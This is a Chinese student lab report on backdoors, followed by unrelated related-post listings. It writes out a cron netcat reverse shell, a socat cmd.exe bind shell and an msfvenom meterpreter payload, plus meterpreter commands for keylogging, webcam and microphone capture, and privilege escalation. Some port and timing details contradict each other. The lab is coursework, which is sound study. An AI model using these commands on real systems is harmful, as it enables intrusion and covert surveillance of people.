20155306 白皎 《网络攻防》 Exp2 后门原理与实践

一、实践基础

后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。其实我们可以用很简单的一句话来概括它:后门就是留在计算机系统中,供某位特殊使用都通过某种特殊方式控制计算机系统的途径

二、实践任务

(1)使用netcat获取主机操作Shell,cron启动

1.在Kali环境下,使用man crontab指令查看crontab命令的帮助文档。

2.用crontab -e指令编辑一条定时任务。

3.在最后一行添加37 * * * * /bin/netcat 192.168.56.1 5306 -e /bin/sh,意思是在每个小时的第45分钟反向连接Windows主机的5306端口。

4.当时间到了11点45时,此时已经获得了Kali的shell,可以输入指令。

(2)使用socat获取主机操作Shell, 任务计划启动

socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

1.在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器。

2.在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5215 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5306,同时把cmd.exe的stderr重定向到stdout上。

3.创建完成之后点击右键,使任务开始运行。

4.此时,在Kali环境下输入指令socat - tcp:192.168.56.1:5306,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5306端口,此时可以发现已经成功获得了一个cmd shell。

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.67.128 LPORT=5306 -f exe > 5306exp2.exe 生成后门程序

2.通过nc指令将生成的后门程序传送到Windows主机上。

3.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口。

4.进行监听。

5.打开Windows上的后门程序。

6.Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell。

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.使用record_mic指令可以截获一段音频

2.使用webcam_snap指令可以使用摄像头进行拍照

3.使用webcam stream指令可以使用摄像头进行录像

4.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

5.使用getuid指令查看当前用户,使用getsystem指令进行提权。由于我的主机是windows8,因此提权失败。

6.使用screenshot指令可以进行截屏

三、基础问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

我觉得可以首先可以通过网页来隐藏木马程序、下载软件时的捆绑恶意软件等等。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 自启动
  • 设置任务计划启动
  • 采用加注册表启动项
  • 引诱用户去主动点击运行某恶意文件

(3)Meterpreter有哪些给你映像深刻的功能?

  • 比如击键功能,可以获取对方的聊天记录以及输入用户名、密码等关键信息
  • 再比如获取摄像头,可以直接看到对方在做什么事情,我想到了上届信安大赛微视演绎中学长学姐的拍的黑客视频,里面就有这样的情节,没想到自己也可以做到哈哈哈!

(4)如何发现自己有系统有没有被安装后门?

  • 使用专杀木马的软件
  • 关闭本机不用的端口或只允许指定的端口访问

20155306 白皎 《网络攻防》 Exp2 后门原理与实践的更多相关文章

  1. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  2. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp2 后门原理与实践

    2018-2019-2 20165312<网络攻防技术>Exp2 后门原理与实践 课上知识点梳理总结 1.后门的概述 后门是指不经过正常认证流程而访问系统的通道 两个关键词:未认证.隐通道 ...

  4. 20155308 《网络攻防》 Exp2 后门原理与实践

    20155308 <网络攻防> Exp2 后门原理与实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpraeter的应用 :MSF POST 模块的应用 学 ...

  5. 20155318 《网络攻防》Exp2 后门原理与实践

    20155318 <网络攻防>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载软件前要勾选一些用户协议,其中部分就存在后门进入系统的安全隐患. ...

  6. 20155321 《网络攻防》 Exp2 后门原理与实践

    20155321 <网络攻防> Exp2 后门原理与实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站 ...

  7. 20155336 虎光元《网络攻防》Exp2后门原理与实践

    20155336 虎光元<网络攻防>Exp2后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒 ...

随机推荐

  1. git工具的使用

    Git工具的出现降低了软件版本维护的成本,极大的提高了工作效率,在这里列出了一些使用方法,方便以后查看. 1.Git的初始化->创建一个Git仓库:git init 2.创建信息:git con ...

  2. The operation names in the portType match the method names in the SEI or Web service implementation class.

    The Endpoint validation failed to validate due to the following errors: :: Invalid Endpoint Interfac ...

  3. 用Model来计算cell的高度

    用Model来计算cell的高度 效果: 将计算cell高度的方法直接移植到Model当中,初始化的瞬间就计算好了高度,非常好用! 源码: Model // // Model.h // // Copy ...

  4. mysql内存评估计算

    这是一个可以评估mysql内存使用大小的网站,根据一些基本的参数,来确定的. 网站:http://www.mysqlcalculator.com/

  5. Ardunio led呼吸灯

    #include <Adafruit_NeoPixel.h> #define PIN 9#define LED_NUM 16Adafruit_NeoPixel strip = Adafru ...

  6. ZT 内地20年经典电视剧大全

    内地20年经典电视剧大全     片尾曲:<故事就是故事> 演唱:戴娆 我听爷爷讲了一个故事 故事里的事是那昨天的事 故事里有好人也有坏人 故事里有好事也有坏事 故事里有多少是是非非 故事 ...

  7. VRSProcess(二)

    1._beginthreadex再谈 Windows操作系统提供了这样的一种解决方案——每个线程都将拥有自己专用的一块内存区域来供标准C运行库中所有有需要的函数使用.而且这块内存区域的创建就是由C/C ...

  8. tomcat-7.0.30安装及配置

    使用说明: 一.1.下载jdk(http://java.sun.com/javase/downloads/index.jsp),2.安装jdk-6u14-windows-i586.exe 3.配置环境 ...

  9. U-Mail如何实现邮件营销自动化?

    对于很多企业来说,人力成本可能就是最大的成本支出了,如果能节省这方面成本支出,也就意味着公司增收了,因此很多公司在做营销工作时,都希望营销能够高效率.有系统.有规划.循序渐进的开展,同时还要减轻营销人 ...

  10. sql server 使用链接服务器连接Oracle,openquery查询数据

      对接问题描述:不知道正式库oracle数据库账户密码,对方愿意在对方的客户端上输入账号和密码,但不告诉我们 解决方案:使用一台sql server作为中间服务器,可以通过转存数据到sql serv ...